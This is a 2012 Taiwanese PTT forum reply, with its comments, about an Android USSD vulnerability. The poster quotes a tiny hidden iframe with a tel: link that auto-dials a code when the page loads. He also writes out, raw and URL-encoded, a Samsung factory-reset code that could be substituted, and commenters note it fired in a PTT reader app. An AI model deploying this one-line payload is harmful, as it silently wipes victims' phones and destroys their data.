Re: [討論] 自我檢測Android漏洞

看板Android作者 (飛影‧忌子)時間13年前 (2012/09/27 17:07), 編輯推噓5(5017)
留言22則, 8人參與, 最新討論串2/2 (看更多)
※ 引述《hayatoman (小小的改變是,成功的開始)》之銘言: 看了一下網頁原始碼... < iframe width="4" height="4" src="tel:*%2306%23" >< /iframe > 簡單一行就可以造成這問題, 那如果把那個 tel:*%2306%23 換成三星的 reset factory 就直接死了 *#2767*3855# > *%232767*3855%23 ... -- ※ 發信站: 批踢踢實業坊(ptt.cc) ◆ From: 112.105.144.47

09/27 17:08, , 1F
他們從頭到尾都在說這件事啊 -..-
09/27 17:08, 1F

09/27 17:09, , 2F
可是一開始的網頁沒寫明(?
09/27 17:09, 2F

09/27 17:09, , 3F
我猜最近一定會有很多人用這去害人
09/27 17:09, 3F
※ 編輯: bestpika 來自: 112.105.144.47 (09/27 17:10)

09/27 17:16, , 4F
09/27 17:16, 4F

09/27 17:57, , 5F
點之前當然要檢查一下...
09/27 17:57, 5F

09/27 18:11, , 6F
這個檢查不出來吧
09/27 18:11, 6F

09/27 18:12, , 7F
都等點進去之後就來不及了
09/27 18:12, 7F

09/27 18:20, , 8F
而且只要iframe就可以跑了 真是有夠危險的漏洞....
09/27 18:20, 8F

09/27 19:45, , 9F
恐怖的是問都沒問直接執行... 照理講應該頂多把號碼自動
09/27 19:45, 9F

09/27 19:46, , 10F
輸入,要不要撥出還是給使用者決定吧...
09/27 19:46, 10F

09/27 20:15, , 11F
USSD都是敲完就直接執行的
09/27 20:15, 11F

09/27 20:15, , 12F
所以就變成一個漏洞....
09/27 20:15, 12F

09/27 21:01, , 13F
也是
09/27 21:01, 13F

09/27 21:23, , 14F
我用MiuPtt看這篇,自動就跳IMEI碼了…好恐怖
09/27 21:23, 14F

09/27 21:24, , 15F
DHD+Nik v4.1 (4.0.3)
09/27 21:24, 15F

09/27 21:33, , 16F
MiuPtt把那段當網頁執行了..
09/27 21:33, 16F

09/27 21:38, , 17F
iOS版的Miuptt 會跳出 文章載入錯誤 然後crash
09/27 21:38, 17F

09/27 23:01, , 18F
假如原po用factory reset當範例不就GG了................
09/27 23:01, 18F

09/28 00:58, , 19F
真的耶,如果剛好用有問題的手機開到factory reset當範例
09/28 00:58, 19F

09/28 00:59, , 20F
正好又是用MiuPTT看,就GG了
09/28 00:59, 20F

09/28 01:00, , 21F
把它放在簽名檔的話就...XD
09/28 01:00, 21F

09/28 01:29, , 22F
原來我讓大家發現另一個問題了 XD
09/28 01:29, 22F
改一下讓它不會被 MiuPTT 讀到 ※ 編輯: bestpika 來自: 123.204.74.44 (09/28 01:30)
文章代碼(AID): #1GP1TOA8 (Android)
文章代碼(AID): #1GP1TOA8 (Android)